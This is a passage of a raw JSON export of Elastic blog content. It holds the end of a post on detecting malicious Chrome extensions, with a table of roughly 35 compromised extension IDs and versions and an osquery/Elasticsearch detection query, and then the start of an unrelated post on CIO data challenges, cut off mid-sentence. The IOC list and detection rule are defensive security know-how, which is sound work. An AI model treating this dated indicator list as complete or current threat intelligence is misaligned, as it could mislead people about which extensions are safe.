compromise\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e campaign. At the bottom of the report is a link to a collection of IOCs that contain the name, ID, and version of known malicious extensions.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"csb57e78e31581daad"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eName\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eID\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eVersion\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eVPNCity\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ennpnnpemnckcfdebeekibpiijlicmpom\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.0.1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eParrot Talks\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ekkodiihpgodmdankclfibbiphjkfdenh\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.16.2\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eUvoice\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eoaikpkmjciadfpddlpjjdapglcihgdle\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.0.12\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eInternxt VPN\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003edpggmcodlahmljkhlmpgpdcffdaoccni\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.1.1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eBookmark Favicon Changer\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eacmfnomgphggonodopogfbmkneepfgnh\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e4.00\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eCastorus\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003emnhffkhmpnefgklngfmlndmkimimbphc\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e4.40\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eWayin AI\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ecedgndijpacnfbdggppddacngjfdkaca\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e0.0.11\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eSearch Copilot AI Assistant for Chrome\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ebbdnohkpnbkdkmnkddobeafboooinpla\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.0.1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eVidHelper - Video Downloader\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eegmennebgadmncfjafcemlecimkepcle\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.2.7\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eAI Assistant - ChatGPT and Gemini for Chrome\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ebibjgkidgpfbblifamdlkdlhgihmfohh\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e0.1.3\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eTinaMind - The GPT-4o-powered AI Assistant!\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ebefflofjcniongenjmbkgkoljhgliihe\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.13.0\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eBard AI chat\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003epkgciiiancapdlpcbppfkmeaieppikkk\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.3.7\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eReader Mode\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ellimhhconnjiflfimocjggfjdlmlhblm\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.5.7\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ePrimus (prev. PADO)\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eoeiomhmbaapihbilkfkhmlajkeegnjhe\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e3.18.0\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eTackker - online keylogger tool\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eekpkdmohpdnebfedjjfklhpefgpgaaji\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.3\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eAI Shop Buddy\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eepikoohpebngmakjinphfiagogjcnddm\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.7.3\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eSort by Oldest\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003emiglaibdlgminlepgeifekifakochlka\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.4.5\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eRewards Search Automator\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eeanofdhdfbcalhflpbdipkjjkoimeeod\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.4.9\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eEarny - Up to 20% Cash Back\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eogbhbgkiojdollpjbhbamafmedkeockb\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.8.1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eChatGPT Assistant - Smart Search\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ebgejafhieobnfpjlpcjjggoboebonfcg\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.1.1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eKeyboard History Recorder\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eigbodamhgjohafcenbcljfegbipdfjpk\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.3\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eEmail Hunter\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003embindhfolmpijhodmgkloeeppmkhpmhc\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.44\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eVisual Effects for Google Meet\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ehodiladlefdpcbemnbbcpclbmknkiaem\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e3.1.3\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eCyberhaven security extension V3\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003epajkjnmeojmbapicmbpliphjmcekeaac\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e24.10.4\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eGraphQL Network Inspector\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003endlbedplllcgconngcnfmkadhokfaaln\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.22.6\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eGPT 4 Summary with OpenAI\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eepdjhgbipjpbbhoccdeipghoihibnfja\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.4\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eVidnoz Flex - Video recorder \u0026amp; Video share\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ecplhlgabfijoiabgkigdafklbhhdkahj\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.0.161\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eYesCaptcha assistant\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ejiofmdifioeejeilfkpegipdjiopiekl\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.1.61\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eProxy SwitchyOmega (V3)\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ehihblcmlaaademjlakdpicchbjnnnkbo\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e3.0.2\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eChatGPT App\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003elbneaaedflankmgmfbmaplggbmjjmbae\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.3.8\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eWeb Mirror\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eeaijffijbobmnonfhilihbejadplhddo\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e2.4\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eHi AI\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ehmiaoahjllhfgebflooeeefeiafpkfde\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e1.0.0\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"csea90c2e5c770e6c1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUsing this list of IOCs, there are two different ways to build a detection. The simplest way is to use these ID and version values to build a single, large Elasticsearch query looking at osquery data for any of these extension identifiers and versions chained together with an \u003c/span\u003e\u003cspan style=\"color: rgb(24, 128, 56);font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eOR\u003c/span\u003e operator. For example:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs098c2e3938fd029d"}}},{"code":{"code":"action_id: pack_browser-monitoring_chrome_extensions AND (\n (osquery.identifier: \"nnpnnpemnckcfdebeekibpiijlicmpom\" AND osquery.version:\t\"2.0.1\") \nOR\n (osquery.identifier: \"kkodiihpgodmdankclfibbiphjkfdenh\" AND osquery.version:\t\"1.16.2\") \nOR\n (osquery.identifier: \"oaikpkmjciadfpddlpjjdapglcihgdle\" AND osquery.version:\t\"1.0.12\")\n)","_metadata":{"uid":"cs130b283c758e25cd"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf6c75b208da847d7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you are ingesting threat intel feeds to your Elastic Stack using one of our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/integrations/current/threat-intelligence-intro.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ethreat intelligence integrations\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, you can create a more dynamic version of this rule using an \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-indicator-rule\"\u003e\u003cspan style='font-size: 12pt;'\u003eindicator match rule type\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. An indicator match rule compares fields in two different index patterns and will trigger an alert when those fields match. If your threat feed supports Google Chrome extension IDs and versions, you can create an indicator match rule that will alert you when an installed chrome extension ID and version matches a known bad extension.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere is an example configuration of an indicator match rule. The indicator index field names will change depending on the threat intel platform being used.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd9ef06a04864b17a"}}},{"image":{"image":{"uid":"bltce37b5fcc1e0fbae","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2025-02-06T04:06:59.725Z","created_by":"bltb6c155cd84fc0c1a","file_size":"267621","filename":"image3.png","parent_uid":null,"tags":[],"title":"image3.png","updated_at":"2025-02-06T04:06:59.725Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-02-06T07:30:00.721Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltce37b5fcc1e0fbae/67a43563ecc9d749ce415095/image3.png"},"_metadata":{"uid":"cs53a4826de528b247"},"caption_l10n":"Example indicator match rule configuration ","alt_text_l10n":"Example indicator match rule configuration ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csecef68ac66c5a793"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe advantage with this method is that there is no need to manually update the detection rule each time a new list of known bad extensions is released or updated. You will immediately be alerted as soon as a new indicator is added to your threat intel index.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Try it out","_metadata":{"uid":"csba92b4cb0ba845f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThreat actors are going to continue to use Chrome extensions as a way to steal valuable information and target systems. If you don’t have visibility of the extensions installed on your workstations, you won’t be able to protect your users from this attack vector. With osquery and Elastic, you can manage and reduce the overall risk to your enterprise with visibility and alerting of browser extensions at no additional licensing costs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTry it out for yourself with a 14 day free trial of \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4e787c451bedb4fd"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs90e55db2cda9afdb"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor an example of how browser extensions can be used in real-world attacks, check out \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/beyond-the-wail\"\u003e\u003cspan style='font-size: 12pt;'\u003eBeyond the wail: deconstructing the BANSHEE infostealer\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs06aeece9997d7600"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9400e43d6b9602b5"}}}],"publish_date":"2025-02-06","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt6df834d6b3085b00","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2025-02-06T04:20:33.199Z","created_by":"bltb6c155cd84fc0c1a","file_size":"149679","filename":"Elastic_Banner_11_(2).jpg","parent_uid":null,"tags":[],"title":"Elastic Banner_11 (2).jpg","updated_at":"2025-02-06T04:20:33.199Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-02-06T07:30:00.700Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6df834d6b3085b00/67a438914bee0bea57186ac9/Elastic_Banner_11_(2).jpg"},"title":"How to detect malicious browser extensions using Elastic","title_l10n":"How to detect malicious browser extensions using Elastic","updated_at":"2025-02-06T04:24:47.726Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/how-to-detect-malicious-browser-extensions-using-elastic","publish_details":{"time":"2025-02-06T07:30:00.652Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt05d717ba5c495082","_version":13,"locale":"en-us","ACL":{},"abstract_l10n":"CIOs face mounting IT challenges like data silos and manual processes, hindering business growth. GenAI and data-driven solutions offer relief, but leaders must address their data management issues to unlock GenAI's full potential for innovation.","author":["blt14f762eec103604e","blt2914a3798eec2d59"],"category":["bltc17514bfdbc519df"],"created_at":"2024-10-08T02:22:35.913Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbc8734cb465d8215"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAmid budget constraints, labor shortages, and the need to do “more with less,” CIOs and IT leaders are facing common IT problems that transcend industries. From poor data accessibility to changing customer expectations, IT leaders are turning to generative AI (GenAI) as an answer to their problems.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eContinuous investments in GenAI promise companies new ways to solve key business problems and build revenue-generating streams. But for most, the key to reaping the \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003ebenefits of GenAI\u003c/a\u003e is hidden in plain sight: data. Data is at the heart of IT innovation, but most businesses today aren’t using their data to its full potential. Investing in a robust data foundation is critical to leverage GenAI to optimize business workflows and innovate. Read on to discover what other challenges IT leaders are facing.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"1. Difficulty getting insights from data","_metadata":{"uid":"cs2ccc9ca2d5c159e2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA substantial 69% of C-suite executives and decision-makers cite the \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003einability to use data continuously\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — in real time and at scale — as a significant hurdle contributing to their company’s business challenges. The result is a lack of real-time insights that forces leaders to rely on their intuitions rather than evidence. This hinders decision-making and stifles growth and efficiency. Operationalizing data isn’t a one-time job. You need tools that can grow as your data does while giving you visibility into your systems.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“We have data silos across the business and are not able to consolidate [them to] have a single pane of glass to make decisions,” explains a \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003etelecommunications C-suite executive\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe feeling is supported by data: 60% of organizations are \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eunsatisfied with the data insights they have today\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with only 35% leveraging data insights daily for business decisions. The inability to make real-time, data-driven business decisions is due to underlying data challenges, with 98% of leaders struggling with some combination of data problems. Notably, 67% of organizations are struggling with separate data solutions for different environments, and in most cases, this is due to inefficient data management. This is partly caused by a lack of adequate tools to manage disparate systems and software — another challenge IT leaders face today.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eGetting insights from data is resource-intensive. It requires time, expertise, and clear objectives and must be integrated into IT development processes. Once you’ve collected relevant data, it takes data analytics and analysis, often with GenAI, to get \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-turn-data-into-actionable-insights\"\u003e\u003cspan style='font-size: 12pt;'\u003eactionable insights\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Actionable insights offer specific measures and steps that can help you achieve a goal by telling you what to do based on your data. With the precision of search and the intelligence of AI —\u0026nbsp; including \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/machine-learning\"\u003e\u003cspan style='font-size: 12pt;'\u003emachine learning (ML)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/natural-language-processing#:~:text=NLP%20techniques%20help%20computers%20analyze,a%20subspecialty%20of%20computational%20linguistics.\"\u003e\u003cspan style='font-size: 12pt;'\u003enatural language processing (NLP)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — you can transform raw proprietary data into actionable insights to accelerate your business outcomes.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"2. Lack of adequate tools","_metadata":{"uid":"cs5c04fdcdfbac300c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTraditionally, organizations have continued to invest in tools that serve a specific purpose based on the needs of the business. However, this conventional technical investment process leads to unplanned isolation and/or duplication of data, information, work, and costs. The result of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/tool-consolidation\"\u003e\u003cspan style='font-size: 12pt;'\u003etool sprawl\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e further inhibits cross-functional collaboration, disables end-to-end visibility of your current environment, and overall creates organizational silos.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLegacy systems can also play a part in tool sprawl. Organizations must balance the cost of phasing these systems out with the cost of keeping them active. And because phasing them out can prove much more expensive, companies remain reliant on legacy systems. As a result, their teams might get stuck with tools that aren’t the most performant and useful for their use cases today. This may mean that all the tools don’t “connect” and speak to each other, ultimately hindering access to real-time, relevant information and digital transformation.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the case of observability and security — practices that share data — redundant work and disparate tools can be detrimental to operations, compromising productivity and security while negatively impacting revenue.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBottom line: inefficient tools and processes create bottlenecks, leading to slower workflows, wasted resources, and increased operational costs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cbr /\u003eIn response to this challenge, 56% of C-suite executives \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan 